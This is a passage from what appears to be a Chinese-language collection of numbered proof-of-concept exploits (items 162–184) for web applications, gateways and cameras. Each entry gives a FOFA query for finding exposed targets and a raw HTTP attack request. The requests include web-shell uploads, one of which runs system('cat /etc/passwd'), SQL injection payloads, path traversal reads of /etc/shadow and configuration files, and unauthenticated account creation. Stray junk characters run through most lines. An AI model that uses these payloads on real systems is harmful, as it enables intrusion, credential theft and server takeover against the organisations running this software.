0 U: n# z; V4 _) C, { rContent-Length: 445
; |+ t& ^+ p% b& L! lContent-Type: text/xml
4 h" m/ I9 Q6 F4 F6 @) E" h2 |Accept-Encoding: gzip
4 g0 H; J2 g8 q; c% L
& Y/ e/ h/ M; }* U5 H3 }<?xml version="1.0" encoding="utf-8"?>
; p7 \3 E$ Z& \& T<soap:Envelope xmlns:xsi=". Q3 e9 [" t- l' R: G
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"( l0 U% {% ~% o4 e# D) `! i7 \
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
- J$ N& @! x, h3 e<soap:Body>
4 Q8 v4 u4 z" Z& O+ Z! O<UploadResume xmlns="http://tempuri.org/">/ W4 i9 N* k3 k8 W, K
<ip>1</ip>8 e8 N, g4 G4 Q- o7 s9 t* s; o
<fileName>../../../../dizxdell.aspx</fileName>+ E6 F1 I5 I5 s* k
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>- ~0 ~0 `, l7 a& V
<tag>3</tag>
& J+ ?3 T: R; h</UploadResume>( c2 l' s' Z3 R+ K# n
</soap:Body>
$ W- C& l. Q7 ]1 p! v# K6 e) ~5 p</soap:Envelope>
" k3 F2 E. }3 X) `- H0 v2 l+ y2 L6 Q8 v
M! f$ v' A+ q% ehttp://x.x.x.x/dizxdell.aspx
( B1 \% }; K/ o; H8 @5 T# |9 G9 s* u% s! W& E* H2 \
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传! z t. [; C. {9 B' o' }
FOFA: app="和丰山海-数字标牌"6 ]6 Y& S' G! j. l- K* t/ ^2 y
POST /QH.aspx HTTP/1.1) n2 I; `+ _6 S; W2 m
Host: x.x.x.x9 r0 T$ W5 Y( S& H2 C. W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
, Q' q/ Z5 K1 z+ C$ kConnection: close
$ [8 H2 E! \/ {0 }7 p" yContent-Length: 583
1 Z* M9 T) Z% {; mContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey( Q' H. o7 B$ Q5 m8 g
Accept-Encoding: gzip( k, R m l$ |+ \% P8 Z
4 @# u0 d, O$ W F) g5 B7 U------WebKitFormBoundaryeegvclmyurlotuey; m& P1 ?- P2 [: F# {4 R( v
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"! Z3 y- U! g# d- k7 }3 w) f
Content-Type: application/octet-stream
d5 X6 L" N0 t1 ]9 k- l9 q3 m# `, _' p1 k1 Y
<% response.write("ujidwqfuuqjalgkvrpqy") %>
! N+ O8 C2 w8 i- L------WebKitFormBoundaryeegvclmyurlotuey) h! o8 N- s( R, v5 M/ _
Content-Disposition: form-data; name="action"
& x) p$ J. R5 M' K5 y' ^6 u: O! S. N' R0 X0 x) m: q% u4 E
upload
4 T/ \7 s. M9 n" W------WebKitFormBoundaryeegvclmyurlotuey
8 K6 E, k& `7 y( x0 EContent-Disposition: form-data; name="responderId"
/ u3 W4 v* N [0 e% r3 k7 t$ C( ~ T6 k
ResourceNewResponder
0 Q3 I6 q( R: I# P------WebKitFormBoundaryeegvclmyurlotuey
8 q8 } F1 ?" \, V0 e7 V3 ~. ^6 pContent-Disposition: form-data; name="remotePath"; l: m/ j; e, }
; f6 A \$ [. V) |& F: ?& S
/opt/resources6 D( B* W: y# Y \6 A) e) i/ [, x
------WebKitFormBoundaryeegvclmyurlotuey--- T6 v2 Y/ s6 i# d' H! c* T3 ^
1 Q8 y7 O3 W1 O8 n4 Z
5 u. K3 ?, c) L2 f0 \" khttp://x.x.x.x/opt/resources/kjuhitjgk.aspx, X5 Z$ c# Z% r5 R- ^) Y1 `1 }1 p0 r! ~
7 V/ V9 D' G5 A6 x
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传1 P$ l& z- w" W, E5 c5 X
FOFA: icon_hash="-795291075"
V9 G! d7 S" O8 z9 r8 bPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1" w; D" ?0 n5 L4 a* [! h
Host: x.x.x.x
- S1 f6 ^ T% h" b( c& m* [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
# L3 {% u1 t2 j! l9 S/ H* yConnection: close8 W( O) s- A* x, r% a
Content-Length: 2930 F$ I; z, I* s
Accept: */*
/ y5 p1 V* ^. g" K; JAccept-Encoding: gzip, deflate) T, Z5 D5 a2 T5 b4 r- L! f' E
Accept-Language: zh-CN,zh;q=0.9
4 T) \& z0 D$ s8 ^5 JContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod: \ g' X8 R/ `& E7 K2 R! X" M
. |. O8 e* G) S) W, M
------iiqvnofupvhdyrcoqyuujyetjvqgocod
( i4 |$ |% I7 w1 m) ^Content-Disposition: form-data; name="name"
1 a% F! ^0 I! T* }6 d
2 z$ z& o4 {% L% l1.php
! `' O3 j! h( f; ~9 y5 }2 ^! i& D------iiqvnofupvhdyrcoqyuujyetjvqgocod( X% }; T7 H$ s Y$ N2 c; }; ^' i
Content-Disposition: form-data; name="upfile"; filename="1.php"
2 f$ }) N4 v7 R# n0 ] ~2 eContent-Type: image/jpeg
( ~5 J' {' @4 L" C: w8 M) T" d/ F- J- w) \7 L/ I% R4 }
rvjhvbhwwuooyiioxega l' G# k7 D1 ]+ g$ n( n/ V% X
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
]6 c) y/ `0 p' p# ~1 V4 m1 R* z2 Z7 o( o! ^- ~: B5 \! M, S
7 ?3 F6 @% h! [- W% l/ p) ?0 ^
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
5 b$ I' c7 |6 A/ c* a. ZFOFA: title="智慧综合管理平台登入"
2 \! @+ @$ _$ o, v1 A! JPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.12 e% l0 c% D4 x; C
Host: x.x.x.x
8 Z; g5 O: I7 m0 B5 ^8 @6 ~6 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.03 ^# O3 j1 p) k. Y9 g0 `& i
Content-Length: 288
$ v. x; C# u2 j3 [Accept: application/json, text/javascript, */*; q=0.01
' d" T3 T; K. h% U3 C/ vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
* A( ~) O- N: S' x0 X$ V' {, mConnection: close# B+ K) |" g. P4 d* h
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl* \) h' Z4 f( M Z. _
X-Requested-With: XMLHttpRequest
; C4 p: }7 |0 G# t* KAccept-Encoding: gzip
2 t9 Y* m4 F# G1 R3 F- t: U/ D4 @3 {4 r/ X
------dqdaieopnozbkapjacdbdthlvtlyl
7 c; ~- D* c: G6 Z& I. T P4 W' |Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
8 [4 W8 }' j' v+ @% O% `# ]$ GContent-Type: image/jpeg# _8 E$ z6 N/ l( J# u7 g
) f( o* B! Q% W: h# ?) z<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
3 Z- {8 V9 i! x" M$ W- L------dqdaieopnozbkapjacdbdthlvtlyl--( G& c! z- f# j" z2 b2 k8 ^
! h f9 O+ f2 M3 _ d
( R2 [' Q& G0 M8 N: i) |. Mhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
. C0 s% v8 r3 F' P$ o& @8 _, d: q- U7 W- y& Y! w4 F6 B2 H
165. OrangeHRM 3.3.3 SQL 注入
3 o% K3 z" h" J* yCVE-2024-36428
- Z+ N1 o" q* [7 E+ VFOFA: app="OrangeHRM-产品"$ {. ~1 R% G, C2 c* }# ^
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
5 \! }8 d5 G2 t0 Q) T+ q+ Z7 f5 A* _' V- U' E9 Y
8 C7 u" C4 Y# J/ ^7 }- a# b166. 中成科信票务管理平台SeatMapHandler SQL注入 c# X& ]- f C
FOFA:body="技术支持:北京中成科信科技发展有限公司"6 v$ B- E9 N* }/ H
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
* K* m& ?: q: ?+ m8 L5 o7 f/ E: \Host:( a, O: j0 u5 W! A. e
Pragma: no-cache
/ x, Q8 N/ E1 WCache-Control: no-cache
9 C8 @9 Q. S% U+ R2 \Upgrade-Insecure-Requests: 1* u; S" U+ c+ U# y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36+ ^# V* y3 g1 ~6 Z6 Z. r" o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# j9 g) S8 Y) V
Accept-Encoding: gzip, deflate0 s) O5 K2 M' ]8 p2 F1 ?) ]& h
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8% ^" N4 R: ?0 f# ^6 i
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE, T) }0 d6 M) e7 d% [! H3 B* i$ J7 V
Connection: close, v) [0 v; h2 }. O! O- d6 u
Content-Type: application/x-www-form-urlencoded' u3 t' Y/ x7 ^) L
Content-Length: 89
' i& g" ?( z9 V+ R1 ]5 i$ F/ r5 Z; U8 p6 |* S% w/ r
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE' J8 ?. N! X [ E
- u, ~# ^2 p! u0 ~$ z
- D/ E4 E# t& M7 J167. 精益价值管理系统 DownLoad.aspx任意文件读取* N: J4 R! V6 {
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"6 V- }: l: x9 E0 h& ?
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1) A& M& M8 t0 G X' L, L/ v
Host:
. e2 M ]% O( G7 Z5 ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36: x& ]/ F9 }# k/ S% @
Content-Type: application/x-www-form-urlencoded* @& r& y7 a3 N0 H4 V) N
Accept-Encoding: gzip, deflate
1 F- c8 C6 A( M9 E; j3 W) S/ z/ {Accept: */*
2 i5 w+ k! X$ M5 k* G: _% C0 sConnection: keep-alive* Y: I# [" E+ g. g
8 F( R$ `. J; B+ n( L. L0 A" S5 f6 D. C( d4 e' j9 p3 j
168. 宏景EHR OutputCode 任意文件读取
% z$ y s) P1 E2 d6 L' {5 |FOFA:app="HJSOFT-HCM"; w u3 k' u# D+ g) ?4 `
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
8 T+ q( u. q6 u# Q. A/ IHost: your-ip( p0 d# f C/ l e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36! B$ w( J( p g9 j1 T
Content-Type: application/x-www-form-urlencoded
( T+ d# l' K- |& [2 w/ XConnection: close$ c+ C, U9 T6 {' z" H- s" p( i
- ?9 M& k8 ~# ~
( ]$ [- k* D1 m- I
H- ?9 _7 j1 F169. 宏景EHR downlawbase SQL注入) P( B" L( c$ p. F0 K3 T
FOFA:app="HJSOFT-HCM"
4 U) y+ X) M8 k% rGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
4 v* `1 B7 m- p5 @% K5 r, O! l: SHost: your-ip: `% j, N& _+ Y1 s- V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 l5 e) a: p" u1 S
Accept: */*6 i' m! N# C3 p) x
Accept-Encoding: gzip, deflate8 m. {$ \* w/ o8 ?3 ?5 J9 y
Connection: close8 a+ }4 f3 |4 P: H ^0 `% S
& A: e, J! O; I" `8 a' I- u
7 O5 W6 `/ U7 d' F8 l$ N1 f, j1 B( ?8 L% n) Z. V ~4 U. F
170. 宏景EHR DisplayExcelCustomReport 任意文件读取 g5 u% W1 w9 P
FOFA:body="/general/sys/hjaxmanage.js"- Y9 i8 I1 U. {
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1. {/ a$ r& V8 A3 K! V# q6 ]4 g
Host: balalanengliang5 d# L: |9 t1 i* Q
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! H0 J1 f8 ]6 L% U2 C
Content-Type: application/x-www-form-urlencoded
% c+ G% ^+ t' b; U: n8 n
$ ~0 Z) }7 e- u3 l0 |9 C `- N3 }filename=../webapps/ROOT/WEB-INF/web.xml
; r" ^1 r$ `& t- C& e( ~
( v0 T. U. R l6 L$ O3 G6 {
3 X2 W' }# B6 u8 E171. 通天星CMSV6车载定位监控平台 SQL注入
* v+ h6 j" W+ _# ?9 M2 EFOFA:body="/808gps/": d1 c7 t" N8 a+ m. w! |
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
. c* T) E# U4 e2 O* W% e7 p( KHost: your-ip
& d. l- \9 [! K) {8 WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
9 ^1 i2 ~# W9 w% l& p/ RAccept: */*
9 w6 M2 M3 V3 d6 \# U qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) Y4 M/ `( i( ?Accept-Encoding: gzip, deflate+ m" e. v9 U/ B$ |4 h7 o5 ~" f
Connection: close% i) G) y6 Z* I; j
9 I0 k7 K U) I8 I6 \( o, N8 S: G4 k& J% O9 L* ~
" ?7 z! r: |1 y/ f
172. DT-高清车牌识别摄像机任意文件读取+ o8 Q, h4 S: s; e
FOFA:app="DT-高清车牌识别摄像机". n! O2 [+ A8 ]! c. A* s6 w
GET /../../../../etc/passwd HTTP/1.13 T# T. C* S: v# q0 s6 @
Host: your-ip
8 a$ d/ S9 c9 _! w+ b' PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
/ E- N: }4 n/ w% D; K0 cAccept-Encoding: gzip, deflate
9 {3 U6 e( j6 Y& D7 }Accept: */*2 I+ a" K* Z' a$ q
Connection: keep-alive
& {; [% Z. b: o- m
0 b/ K( i' b5 `- I1 X# M) J" c6 g* Q7 _
5 o6 v8 k) q1 I
173. Check Point 安全网关任意文件读取/ A9 R( X6 j3 `5 q( P/ `% u
CVE-2024-24919* e+ H. L9 t! q: d) E
FOFA:app="Check_Point-SSL-Network-Extender"8 A& D) a$ H8 _/ O& r: C9 y4 N
POST /clients/MyCRL HTTP/1.1
0 z9 ?. Y% t% U7 aHost: your-ip8 p0 j* J" W- f |% C! C
Content-Type: application/x-www-form-urlencoded
2 c9 K* r% ~# |! @) |' h
$ Q& A6 j) Z/ _! IaCSHELL/../../../../../../../etc/shadow) B/ v; z$ h& S" }5 V# m& v2 y
' ]3 j# Y) m& G9 G1 { L1 ?
, X2 y. Q2 A. j$ p0 p
! t, C, e C! J; z, l8 H+ {; z
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
* h Q. \5 T2 Q) L7 i+ m; D: MFOFA:app="金和网络-金和OA"! X" ^8 l6 s4 o+ U
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.10 q/ S7 S8 X7 |0 {6 \
Host: your-ip
) E' `3 ~, {3 uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 j9 P- C5 [) A1 B2 C$ k; T8 a$ [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 n4 g0 r; p& @& aAccept-Encoding: gzip, deflate, br& `) J1 k/ s7 R! f) n6 M7 t' @
Accept-Language: zh-CN,zh;q=0.9* Z* M+ J! _, x. k/ U- j/ C
Connection: close& t$ g# p- s% D
) \' f( }- |% q$ ~1 q5 i4 Q# K" Q1 ?
% ]" P1 {$ ^% Q# _" F
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
; O, b1 L' t6 O& E) b, wFOFA:app="金和网络-金和OA"
0 H) r8 X; R4 D7 `GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1" U( @0 i: Z( l9 ]3 \' \+ z" Q
Host:8 v$ u) y$ \; j' l8 o
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
) ^, ]* `+ k, h, v9 Z9 l, O& a0 VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, l* m& Z/ r" D. ~+ a- q5 nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; ?- q( Y$ T" m; q* A
Accept-Encoding: gzip, deflate
' D% L, |- U. ] S9 k5 AConnection: close+ F% S E/ m0 p3 b
Upgrade-Insecure-Requests: 1
: ?3 z8 O) x& C( Q) U: _% U/ l4 m- E6 i9 O7 J
( Q) a7 S" F$ T1 H; r176. 电信网关配置管理系统 rewrite.php 文件上传
7 p' C5 T" P1 [3 \9 v" \: Q! EFOFA:body="img/login_bg3.png" && body="系统登录"
8 G" v2 d5 ]2 J& ?* D0 a- zPOST /manager/teletext/material/rewrite.php HTTP/1.1
2 E- R5 g. ?+ [3 E& c" vHost: your-ip
- Q c5 |: I' e0 O) R; G6 x- O. ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
. k+ ?$ A( n/ ?Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT: r4 e2 g( Y& Q% T6 A- O0 P
Connection: close
3 D; N2 a; P& O4 B" p b- p& N. l1 ]1 |
------WebKitFormBoundaryOKldnDPT8 R- B3 p7 v' c& s5 n J5 o
Content-Disposition: form-data; name="tmp_name"; filename="test.php"* J% @2 h! t$ Z9 d0 ?
Content-Type: image/png R' v0 K1 ~7 \: R$ l9 ^
/ m6 q- m( {" s<?php system("cat /etc/passwd");unlink(__FILE__);?>
( t& U: \. {# p2 |. m5 A8 M9 F" v------WebKitFormBoundaryOKldnDPT
# J) X8 E$ P, p7 N1 \3 t2 JContent-Disposition: form-data; name="uploadtime"
" k* m2 b0 [9 I+ m# ?$ X, O6 S6 q 0 F% Z$ J0 f9 e; A2 F7 ` A+ ]9 W
' j3 l* _; @2 u. O------WebKitFormBoundaryOKldnDPT--5 h3 G& z$ o6 {
) t, F- Z+ A- t! }1 C( S1 |( N" X* K) U! a2 q+ l4 r- K) ~
0 }3 y& E, z2 K1 ]6 D0 ]177. H3C路由器敏感信息泄露' t1 ]0 v4 b; g; x1 M! z
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg: w5 F' V7 m/ A, ]5 X) e5 i. N
/userLogin.asp/../actionpolicy_status/../M60.cfg
: j. p' F& K3 K/userLogin.asp/../actionpolicy_status/../GR8300.cfg7 {; B( i. g: _! y$ X3 ^
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
1 q6 U* | v( w9 S, x$ j& w/userLogin.asp/../actionpolicy_status/../GR3200.cfg$ P3 q/ O: M! w6 W X
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
2 g9 i( C9 G3 @6 t V- U5 _2 H2 L/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg" E" Y" U, H) G3 M3 c8 O" X. O# L- l
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg9 O% h% T' g( O- ?3 U6 h- v8 l
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg8 x/ @' y; @: l+ @
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
" I8 p0 T( S7 h9 v2 ?/userLogin.asp/../actionpolicy_status/../ER5200.cfg8 h4 t% _/ v/ ?9 O( M
/userLogin.asp/../actionpolicy_status/../ER5100.cfg6 ]: [6 A5 \* Z
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg# x: w9 g0 K. z; b
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
7 D2 @0 H; U, e# g& @4 [/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg) v0 N& ]( i% {" n' U. n
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
& O, H& H H w7 M/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg2 B+ L" N4 h" \& [$ r( }+ b
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg7 A+ a. a0 m" O) ]; g: ~8 s
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg* k' q4 K4 G# ?* `" Y4 i
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
) J6 x- Z1 e' ]: E# I* M5 O/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
0 }9 L* \6 }, v( I u: I
1 Y: }* b' j- x7 J* g' L: M
5 I6 n! ?/ X h3 G8 o178. H3C校园网自助服务系统-flexfileupload-任意文件上传) x6 B8 c! o1 D% s! N3 n
FOFA:header="/selfservice"
8 }; ] a* o; i% h8 r" |, fPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.12 j! N( O, u, K9 B/ J
Host:
! \, _9 X3 O% U4 I a* C# yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.360 a: e! @ u- Y$ B' A8 M" b. g" ~
Content-Length: 252/ S- k: t7 T( w* c. s# [1 ~
Accept-Encoding: gzip, deflate2 }' G5 E+ I9 U
Connection: close
) v" \0 l0 _. t' k8 |% A& F; q) ]Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
& M4 c- q9 V7 d& L9 A3 [9 i-----------------aqutkea7vvanpqy3rh2l& o* m$ U. f j5 v9 z: [
Content-Disposition: form-data; name="12234.txt"; filename="12234"
& S, U7 ~# w* x1 AContent-Type: application/octet-stream4 e5 x7 {) q8 D; C0 K% e5 s
Content-Length: 255
% B, I1 ]1 s% w5 y" w( {- ]. T9 h; b; o7 [+ }& E5 o( {( r; K. t
12234
/ L9 Q' b: j# C& ~+ B# t3 q% g-----------------aqutkea7vvanpqy3rh2l--2 k- e; \( ^8 X2 E u1 I+ N
7 A( Y" t: k; k5 s8 n" B
$ T. F$ F2 n: t2 n& E: }/ aGET /imc/primepush/%2e%2e/flex/12234.txt
6 p% r- X2 b9 }( l, k% V& k$ _% f8 G% |$ e2 c$ _1 i# ]! v
6 M. N% e, [1 a% }2 k3 W3 X179. 建文工程管理系统存在任意文件读取1 |4 |! ^5 X8 u
POST /Common/DownLoad2.aspx HTTP/1.1$ U- S9 k9 _5 z9 d
Host: {{Hostname}}( H2 K# P' J# `/ K; ?7 |2 R
Content-Type: application/x-www-form-urlencoded. S* [/ a: \! I) g
User-Agent: Mozilla/5.0
- E* k- w. P% l o# O2 D3 K& \* {: l* T3 Q1 M
path=../log4net.config&Name=3 I3 p3 o6 Z/ }0 p. x8 ^
' D! u" V0 S c. f9 Z( j* t* @- @
3 V. W% k/ l, Y/ w9 a: O
180. 帮管客 CRM jiliyu SQL注入* \' a, T! D1 U- t; e6 T/ h7 [
FOFA:app="帮管客-CRM"
1 D |& W1 [4 o$ n* n1 xGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1. G/ ]2 S$ E' n3 m& O2 b- P: t2 p
Host: your-ip% O* e& {! E, F1 u4 P" H U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.362 W! i+ w% L+ [& h1 Y3 A' S: t( v- D6 u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 X) K' L* w, C2 Z5 E
Accept-Encoding: gzip, deflate& D3 t! H: c; ~3 _" _, p1 c: Y' B
Accept-Language: zh-CN,zh;q=0.9" H0 f7 V: s% k Z
Connection: close
) d& w, }1 q, }; U8 y
' U& T+ P# S. k. Y* H. I- _) |0 A7 x
, c6 g. [: z' r, k181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
; w6 y6 f; D- B4 j jFOFA:"PDCA/js/_publicCom.js"# d/ E3 t3 \+ B; S& I) W! Y p5 Y
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.14 v/ o6 z! I$ N9 w P1 l
Host: your-ip
0 f0 u+ y5 W7 q# FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36: S/ Q* f; y1 G& ^$ u/ r y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 n; X7 n) J- Q) i- z0 f X
Accept-Encoding: gzip, deflate, br
9 }6 \8 H( V3 f4 o" Q5 C' m6 T( z% mAccept-Language: zh-CN,zh;q=0.9" F9 c$ X! T4 T
Connection: close; D# ^2 G; c4 Q3 V8 H! ]
Content-Type: application/x-www-form-urlencoded7 o! I% J) [+ x, J
. F' U9 b$ Z1 i6 G, w7 U
a3 C+ Y' |+ D9 ?action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=209 Y6 Y( j: k( [: `
2 C2 n$ t9 ^7 w; f+ j
# l1 J+ o4 z4 }; j: |
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
* P, X% k* [9 r& Q8 z( lFOFA:"PDCA/js/_publicCom.js"
: h+ T9 {' |. i+ w! G% iPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
/ c7 C3 w! `% |: k2 C- N! ]1 AHost: your-ip
1 t7 B9 w! @1 D/ I8 \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 i/ k* i( i- c, P' b! U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. q' D5 n9 f4 k8 w* Q Q
Accept-Encoding: gzip, deflate, br+ L& w8 [5 L; a
Accept-Language: zh-CN,zh;q=0.9
|4 Z7 ]" S2 _% O+ JConnection: close5 w% H* {: T% K( C4 |+ \ \; m
Content-Type: application/x-www-form-urlencoded
% n. {, o* m8 u& K) f6 L% n* x4 O/ b1 e2 h0 b; J' c5 e! Z# f
0 i$ A n( G" I$ T4 \' Q9 L
username=test1234&pwd=test1234&savedays=1+ ]5 M6 \4 V& z
+ `& Q' B( O# R) j/ E \3 D
/ t0 u' _ k/ A5 C183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
4 j# @ a" w- pFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
2 B4 ~& S1 \7 t, Z7 { S: oGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
# \& z8 d' e0 |; LHost: your-ip
8 I( Q; S! g0 x4 o( m2 G- Q9 QUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36* v9 S% z/ P: M0 i
Accept-Charset: utf-8
$ Y, E0 d! M w3 B, ?Accept-Encoding: gzip, deflate
" Y- j( E$ K6 ~7 Y# W' B" `Connection: close
5 h3 I4 L6 M9 W* H3 V4 g2 Y3 G& b! s' S4 F
( M% F9 r6 @: L7 A7 z184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加7 r! v+ _! z1 H. y
FOFA:server="SunFull-Webs"5 @. V& O2 \) y t
POST /soap/AddUser HTTP/1.1
7 L5 q2 s- E# o9 s. |* zHost: your-ip
4 c$ }* O7 r$ s) _Accept-Encoding: gzip, deflate
